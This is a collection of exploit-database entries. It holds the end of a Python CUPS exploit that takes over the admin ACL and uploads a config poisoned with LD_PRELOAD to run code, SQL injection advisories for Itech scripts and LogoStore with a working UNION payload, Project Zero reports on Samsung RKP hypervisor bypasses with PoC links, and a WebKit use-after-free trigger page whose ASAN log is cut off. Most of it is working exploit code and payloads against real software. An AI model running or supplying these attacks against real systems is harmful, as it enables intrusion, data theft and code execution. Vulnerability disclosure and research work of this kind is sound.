"Content-Length: " + str(len(conf_stomp)) + "\x0d\x0a"
"\x0d\x0a")
pretty("*","stomping ACL")
pretty("*",">:\n" + createDump(http_header1 + admin_stomp))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header1 + admin_stomp)))
time.sleep(1)
pretty("*",">:\n" + createDump(http_header2 + conf_stomp))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header2 + conf_stomp)))
http_header_check = ("GET /admin HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
pretty("*","checking /admin")
pretty("*",">:\n" + createDump(http_header_check))
res = txrx(rhost,rport,"tcp",http_header_check)
pretty("*","<:\n" + createDump(res))
m = re.search('200 OK', res)
if m is not None:
pretty("+","ACL stomp successful")
else:
pretty("-","exploit failed")
exit(1)
def getConfig(rhost, rport):
i = random.randint(1,1024)
original_config = ""
http_request = ("GET /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
pretty("*","grabbing configuration file....")
res = txrx(rhost,rport,"tcp",http_request)
res_array = res.split("\x0d\x0a\x0d\x0a")
original_config = res_array[1]
pretty("*","config:\n" + original_config + "\n")
return original_config
def putConfig(rhost, rport, config):
http_request = ("PUT /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Keep-Alive\x0d\x0a"
"Content-Length: " + str(len(config)) + "\x0d\x0a"
"\x0d\x0a")
pretty("*","overwriting config...")
pretty("*",">:\n" + createDump(http_request + config))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config)))
def poisonConfig(config, name):
config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d000" + name + "-001\x0a"
return config
def main():
rhost = None;
rport = None;
noshell = None;
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','lib=','stomp-only','help'])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
elif opt in ('-c','--lib'):
libpath = arg;
elif opt in ('-f','--stomp-only'):
noshell = 1;
banner()
if rhost is None or rport is None:
usage()
pretty("*","locate available printer")
printer = locatePrinters(rhost, rport)
pretty("*","stomp ACL")
stompACL(rhost, rport, printer)
if (noshell is not None):
pretty("*","fin")
exit(0)
pretty("*","prepare payload")
payload = preparePayload(libpath)
pretty("*","spray payload")
jobid = seedTarget(rhost, rport, printer, payload)
pretty("*","grab original config")
OG_config = getConfig(rhost, rport)
pretty("*","generate poison config")
evil_config = poisonConfig(OG_config, jobid)
pretty("*","upload poison config")
putConfig(rhost, rport, evil_config)
pretty("*","fin")
exit(0);
if __name__ == "__main__":
main()
# # # # #
# Exploit Title: Itech Travel Portal Script v9.35 - SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://www.itechscripts.com/travel-portal-script/
# Demo: http://travel.itechscripts.com/
# Version: 9.35
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/pages.php?id=[SQL]
# http://localhost/[PATH]/content.php?id=[SQL]
# http://localhost/[PATH]/faq_show.php?fid=[SQL]
# http://localhost/[PATH]/showCity.php?q=[SQL]
# E.t.c... E.t.c...
# # # # #
# # # # #
# Exploit Title: Itech Movie Portal Script v7.37 - SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/movie-portal-script/
# Demo: http://movie-portal.itechscripts.com
# Version: 7.27
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/faq_show.php?fid=[SQL]
# http://localhost/[PATH]/cms.php?id=[SQL]
# http://localhost/[PATH]/show_news.php?id=[SQL]
# http://localhost/[PATH]/show_misc_video.php?id=[SQL]
# E.t.c... E.t.c...
# # # # #
# # # # #
# Exploit Title: Itech Auction Script v6.49 – 'pid' Parameter SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/auction-script/
# Demo: http://auction.itechscripts.com/
# Version: 6.49
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/ajax-files/list_photo.php?pid=[SQL]
# E.t.c.
# # # # #
# # # # #
# Exploit Title: Itech News Portal Script v6.28 - 'sc' Parameter SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/news-portal-script/
# Demo: http://news-portal.itechscripts.com/
# Version: 6.28
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/subcategory.php?sc=[SQL]
# E.t.c.
# # # # #
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=981
As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.
One of the protections implemented by RKP is a security policy meant to ensure that only the "authentic" kernel code pages are executable from EL1. This mitigation is achieved by combining a few memory protection policies together, namely:
-All pages with the exception of the kernel code are marked PXN
-All kernel code pages are marked read-only in the stage 2 translation table
-Kernel data pages are never marked executable
-Kernel code pages are never marked writable
(for more information, see https://www2.samsungknox.com/en/blog/real-time-kernel-protection-rkp)
In order to explore this mitigation technique, I've written a small tool to dump the stage 1 and stage 2 translation tables for EL0/EL1. First, the initial stage 2 translation table is embedded in the VMM code, so it can be statically retrieved and analysed. Here is a short snippet from the initial stage 2 translation table (the addresses here are PAs, although RKP implements a one-to-one PA<->IPA translation, barring memory protections):
...
0x80000000-0x80200000: S2AP=11, XN=0
0x80200000-0x80400000: S2AP=11, XN=0
0x80400000-0x80600000: S2AP=11, XN=0
0x80600000-0x80800000: S2AP=11, XN=0
0x80800000-0x80a00000: S2AP=11, XN=0
0x80a00000-0x80c00000: S2AP=11, XN=0
0x80c00000-0x80e00000: S2AP=11, XN=0
0x80e00000-0x81000000: S2AP=11, XN=0
0x81000000-0x81200000: S2AP=11, XN=0
0x81200000-0x81400000: S2AP=11, XN=0
0x81400000-0x81600000: S2AP=11, XN=0
...
The physical address range above corresponds with the physical address range in which the kernel code is located. As can be seen above, this entire address range is mapped as RWX in the initial stage 2. However, obviously RKP does not leave this area unprotected, as this might allow an attacker to subvert the kernel's integrity (by writing to the kernel's code pages). When RKP is initialized (i.e., when the HVC command RKP_INIT is called from EL1), the HLOS kernel passes a structure containing the address ranges for the currently loaded kernel. Here is a short snippet from "rkp_init" (init/main.c):
static void rkp_init(void)
{
rkp_init_t init;
init.magic = RKP_INIT_MAGIC;
init.vmalloc_start = VMALLOC_START;
init.vmalloc_end = (u64)high_memory;
init.init_mm_pgd = (u64)__pa(swapper_pg_dir);
init.id_map_pgd = (u64)__pa(idmap_pg_dir);
init.rkp_pgt_bitmap = (u64)__pa(rkp_pgt_bitmap);
init.rkp_map_bitmap = (u64)__pa(rkp_map_bitmap);
init.rkp_pgt_bitmap_size = RKP_PGT_BITMAP_LEN;
init.zero_pg_addr = page_to_phys(empty_zero_page);
init._text = (u64) _text;
init._etext = (u64) _etext;
if (!vmm_extra_mem) {
printk(KERN_ERR"Disable RKP: Failed to allocate extra mem\n");
return;
}
init.extra_memory_addr = __pa(vmm_extra_mem);
init.extra_memory_size = 0x600000;
init._srodata = (u64) __start_rodata;
init._erodata =(u64) __end_rodata;
init.large_memory = rkp_support_large_memory;
rkp_call(RKP_INIT, (u64)&init, 0, 0, 0, 0);
}
Upon receiving this command, RKP changes the stage 2 permissions for the address range corresponding to the kernel text (from "init._text" to "init._etext") to read-only and executable, like so:
...
kernel_text_phys_start = rkp_get_pa(text);
kernel_text_phys_end = rkp_get_pa(etext);
rkp_debug_log("DEFERRED INIT START", 0LL, 0LL, 0LL);
if ( etext & 0x1FFFFF )
rkp_debug_log("Kernel range is not aligned", 0LL, 0LL, 0LL);
if ( !rkp_s2_range_change_permission(kernel_text_phys_start, kernel_text_phys_end, 128LL, 1, 1) )
rkp_debug_log("Failed to make Kernel range RO", 0LL, 0LL, 0LL);
rkp_l1pgt_process_table(init_mm_pgd, 1u, 1u);
...
However, notice that the code above only marks the region from _text to _etext as read-only. This region is *strictly smaller* than the physical address range reserved for the kernel text region (in part in order to account for RKP's KASLR slide, which means the kernel can be placed at several offsets within this region). If we take a look at the stage 1 translation table from TTBR1_EL1, we can see that the kernel code pages are allocated using L2 block descriptors (i.e., a large granularity), like so:
...
[256] L1 table [PXNTable: 0, APTable: 0]
[ 0] 0x080000000-0x080200000 [PXN: 0, UXN: 1, AP: 0]
[ 1] 0x080200000-0x080400000 [PXN: 0, UXN: 1, AP: 0]
[ 2] 0x080400000-0x080600000 [PXN: 0, UXN: 1, AP: 0]
[ 3] 0x080600000-0x080800000 [PXN: 0, UXN: 1, AP: 0]
[ 4] 0x080800000-0x080a00000 [PXN: 0, UXN: 1, AP: 0]
[ 5] 0x080a00000-0x080c00000 [PXN: 0, UXN: 1, AP: 0]
[ 6] 0x080c00000-0x080e00000 [PXN: 0, UXN: 1, AP: 0]
[ 7] 0x080e00000-0x081000000 [PXN: 0, UXN: 1, AP: 0]
[ 8] 0x081000000-0x081200000 [PXN: 0, UXN: 1, AP: 0]
[ 9] 0x081200000-0x081400000 [PXN: 0, UXN: 1, AP: 0]
[ 10] 0x081400000-0x081600000 [PXN: 1, UXN: 1, AP: 0]
...
Moreover, as we can see above, the region 0x080000000-0x081400000 is marked as RWX in the stage 1 translation table, even though the kernel code pages only take up a much smaller area within this region.
Combining these facts, we arrive at the conclusion that any address in the range 0x080000000-"_text" or "_etext"-0x081400000 are marked as RWX both in stage 1 and stage 2, even after RKP is initialized.
This issue can be reproduced by simply writing code to any of these memory regions in EL1 and executing it directly (e.g., writing code to address 0xffffffc000000000 in the kernel's VAS).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41217.zip
Exploit Title: LogoStore - SQL Injection
Date: 27.01.2017
Software Link: https://codecanyon.net/item/logostore-buy-and-sell-logos-online/19379630
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
LogoStore is a web application that allows you to buy and sell logos online. Manage logos within your account, check others logos and sell your own!
Type of vulnerability:
An SQL Injection vulnerability in LogoStore allows attackers to read
arbitrary data from the database.
Vulnerable URL : http://locahost/LogoStore/search.php
Mehod : POST
Parameter : query
Simple Payload:
Type: UNION query
Payload: query=test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search=
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=979
As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.
One of the features supported by RKP (but not yet supported by the Linux Kernel), is a form of control flow protection which is meant to mitigate the ROP and JOP exploitation techniques. This mitigation leverages a 64-bit key stored in the hypervisor in order to encrypt the return addresses and frame pointers stored on a given kernel task's stack.
RKP provides two commands which produce a value using the 64-bit hypervisor key, namely:
-cfp_ropp_new_key (RKP command 0x91)
-cfp_ropp_new_key_reenc (RKP command 0x92)
Both of these commands convert the given virtual address from the kernel VAS to a physical address, but fail to verify the resulting address either via "physmap", or by checking that the given address does not reside in the physical address range of RKP itself.
This means an attacker can issue these RKP calls in order to corrupt RKP memory or write to regions which are S2-protected by EL2 (for example, the EL0/1 translation tables).
When the aforementioned commands are executed, they read the value of the HYP-mode physical timer (CNTHP_TVAL_EL2) and then write the value (timer_value XOR 64bit_cfpropp_key) into the attacker-controlled memory location. Note that the 64-bit key is not secret, as it can be deduced by the attacker by requesting the hypervisor to "encrypt" a given 64-bit value, and then XOR-ing it back again with the original value to obtain the key. Furthermore, the key is currently not even randomly generated, but rather hard-coded into the hypervisor (the current key embedded in the hypervisor is 0xDB551FCBF3F95C53).
Here is an outline of an attack scenario in which an attacker can gain code execution within RKP (EL2) from EL1:
1. Get code execution in EL1
2. Locate the PTE/PMD/PGD in TTBR1_EL1 pointing to an RKP code page
3. Call "cfp_ropp_new_key_reenc" repeatedly to modify the translation table entry's AP bits to allow it to be writable
4. (In case the region is S2-protected, do the same for the entries in VTTBR)
5. Write directly to RKP's code segment from EL1
Lastly, it seems as though the RKP code pages are mapped as writable in TTBR_EL2 (and TCR_EL2.WXN is not set) - allowing the attacker to use these commands (or any other RKP memory corruption) in order to directly modify RKP code.
Proof of concept for the RKP CFP_ROPP_* memory corruption issue.
This PoC uses the CFP_ROPP_* commands to modify a kernel address in the kernel VAS.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41211.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=980
As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.
In order to prevent EL0 and EL1 code from creating disallowed memory mappings (e.g., disabling PXN on areas not in the kernel text or enabling write permissions to a kernel code page), RKP employs a system through which all modifications to the S1 translation table are validated by the hypervisor. Moreover, RKP marks the EL0 and EL1 translation tables as read-only in the stage 2 translation table for EL0/1.
Normally, an adversary running in EL1 would be able to directly modify the value of TTBR0_EL1 and TTBR1_EL1, which would allow them to subvert the S1 protections. However, RKP correctly traps such MSRs in order to make sure any new translation table is also verified.
Specifically, when an MSR to a memory management control register is executed by EL1, it triggers a synchronous exception in the hypervisor. In the case of RKP, this exception is handled by the function "vmm_synchronous_handler". The function checks whether the abort is due to an MRS/MSR from EL1, and if so, calls the function "other_msr_system" in order to service the request.
As mentioned above - RKP does, in fact, verify the translation tables when set via TTBR0 and TTBR1 (by calling "rkp_l1pgt_ttbr"). However, for MSRs targeting the TCR_EL1 and SCLTR_EL1 registers, it directly modifies their value from EL2 without performing any validation.
These two registers are extremely sensitive and modifying their values allows an attacker to subvert the RKP memory protections.
TCR_EL1
-------
In the case of TCR_EL1, the attacker can set TCR_EL1.TG0 or TCR_EL1.TG1 in order to signal that the translation granule for TTBR0 or TTBR1 (accordingly) is any value other than the default 4KB granule used by the Linux Kernel.
Modifying the translation granule allows an attacker to subvert the stage-1 memory mapping restrictions used by RKP. This is since RKP incorrectly assumes that the translation granule is 4KB without actually checking the value in TCR_EL1.TGx.
For example, when protecting the translation table in TTBRx_EL1, RKP only s2-protects a 4KB region - since when using the 4KB granule, the translation regime has a translation table size of 4KB. However, for a translation granule of 64KB, the translation regime has a translation table size of 64KB.
This means that the bottom 60KB of the translation table remain unprotected by RKP, allowing an attacker in EL1 to freely modify it in order to point to any wanted IPA, with any AP and PXN/UXN values.
SCTLR_EL1
---------
In the case of SCTLR_EL1, the attacker can unset SCTLR_EL1.M in order to disable the stage 1 MMU for EL0 and EL1 translations. This would allow an attacker to trivially bypass the stage-1 protections (such as the ones discussed above), as no AP or XN permission checks would be present for stage 1 translations.
Lastly, it should be noted that while these MSRs might not be present in the kernel's code, they *are* present in RKP's code. As RKP's code pages are executable from EL1, an attacker can simply call these MSRs directly from RKP's code while running in EL1.
I've statically verified this issue on the RKP binary (version "RKP4.2_CL7572479") present in the open-source kernel package "SM-G935F_MM_Opensource".
Proof of concept for the RKP unprotected MSRs issue.
This PoC disables the M bit in SCTLR_EL1.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41212.zip
<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1044 -->
<script>
function go() {
output.value = "aaa";
output.appendChild(inserted_div);
document.getElementById("output").addEventListener('DOMSubtreeModified', function () {
for(var i=0; i<20; i++) {
form.appendChild(document.createElement("input"));
}
}, false);
form.reset();
}
</script>
<body onload=go()>
<div id="inserted_div">foo</div>
<form id="form" onchange="eventhandler()">
<input type="text" value="foo">
<output id="output" oninput="eventhandler()"></output>
<input type="text" value="foo">
<!--
=================================================================
Analysis:
The bug is in HTMLFormElement::reset() function, specifically in this part:
for (auto& associatedElement : m_associatedElements) {
if (is<HTMLFormControlElement>(*associatedElement))
downcast<HTMLFormControlElement>(*associatedElement).reset();
}
The issue is that while m_associatedElements vector is being iterated, its content can change (HTMLFormControlElement being added or removed from it).
Normally HTMLFormControlElement.reset() doesn't change the DOM, but there is one exception to this: The 'output' element. In WebKit, resetting the output element is equivalent to setting its textContent, which causes all of its child elements (if any) to be removed from the DOM tree.
Using this trick we can remove elements from m_associatedElements while it is being iterated. However, this by itself is not sufficient to exploit this issue as m_associatedElements.remove(index) (called from HTMLFormElement::removeFormElement()) won't actually reallocate the vector's buffer, it will only decrease vector's m_size and the vector's elements after m_size will still point to the (former) form members. (It might be possible to force the removed form members to be deleted but I haven't experimented with this).
So instead of removing elements from the m_associatedElements vector, I instead add elements to it while it is being iterated. I did this by adding DOMSubtreeModified event listener to the output element, so that when the output element gets reset, the event triggers and in the event hanlder newly created input elements are added to the form. This causes the vector's buffer to be reallocated to accommodate the new form elements. The loop inside HTMLFormElement::reset() continues to iterate over now deleted buffer, causing the use-after free condition.
If an attacker manages to reclaim the space of the freed buffer and fill it with attacker-controlled data (there is plenty of opportunity to do this inside the DOMSubtreeModified event handler. Also note that the size of the freed buffer can be chosen by the attacker), subsequent iterations over m_associatedElements will cause HTMLFormControlElement::reset() method to be called on the attacker-controlled pointer. Since HTMLFormControlElement::reset() is a virtual function, this can easily lead to code execution.
ASAN log:
=================================================================
==1963==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000a2c50 at pc 0x000109144e28 bp 0x7fff5ee93e10 sp 0x7fff5ee93e08
READ of size 8 at 0x60c0000a2c50 thread T0
#0 0x109144e27 in WebCore::HTMLFormElement::reset() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2be27)
#1 0x1099b32e0 in WebCore::jsHTMLFormElementPrototypeFunctionResetCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x149a2e0)
#2 0x1099b0cdd in long long WebCore::BindingCaller<WebCore::JSHTMLFormElement>::callOperation<&(WebCore::jsHTMLFormElementPrototypeFunctionResetCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1497cdd)
#3 0x2e505aa01027 (<unknown module>)
#4 0x105d07f0c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x126af0c)
#5 0x105d07f0c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x126af0c)
#6 0x105d014da in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12644da)
#7 0x1059a1c5d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf04c5d)
#8 0x105908033 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xe6b033)
#9 0x104f718d1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4d48d1)
#10 0x104f719fb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4d49fb)
#11 0x104f71d46 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x4d4d46)
#12 0x1095a9e2e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1090e2e)
#13 0x109894c66 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x137bc66)
#14 0x108dea325 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8d1325)
#15 0x108de9e4f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8d0e4f)
#16 0x108cd52f1 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7bc2f1)
#17 0x108ce4ebf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7cbebf)
#18 0x108bf105f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6d805f)
#19 0x108bebdae in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6d2dae)
#20 0x108f57481 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa3e481)
#21 0x108f5496a in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa3b96a)
#22 0x108c098ed in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6f08ed)
#23 0x10910721d in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbee21d)
#24 0x108ca018c in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x78718c)
#25 0x108c645ef in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x74b5ef)
#26 0x10876f577 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x256577)
#27 0x10876a479 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x251479)
#28 0x10acc2f84 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27a9f84)
#29 0x101662f95 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8def95)
#30 0x1016625aa in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de5aa)
#31 0x1010126a9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x28e6a9)
#32 0x100e320a8 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xae0a8)
#33 0x100e3b274 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb7274)
#34 0x1062d3964 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1836964)
#35 0x1062d427e in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x183727e)
#36 0x7fff96c637e0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xaa7e0)
#37 0x7fff96c42f1b in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x89f1b)
#38 0x7fff96c4243e in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x8943e)
#39 0x7fff96c41e37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
#40 0x7fff8cad1934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
#41 0x7fff8cad176e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
#42 0x7fff8cad15ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
#43 0x7fff8a8fcdf5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
#44 0x7fff8a8fc225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
#45 0x7fff8a8f0d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
#46 0x7fff8a8ba367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
#47 0x7fff82c7c193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
#48 0x7fff82c7abbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
#49 0x100d69b73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#50 0x7fff8a7fa5ac in start (/usr/lib/system/libdyld.dylib+0x35ac)
0x60c0000a2c50 is located 16 bytes inside of 128-byte region [0x60c0000a2c40,0x60c0000a2cc0)
freed by thread T0 here:
#0 0x103345db9 in wrap_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4adb9)
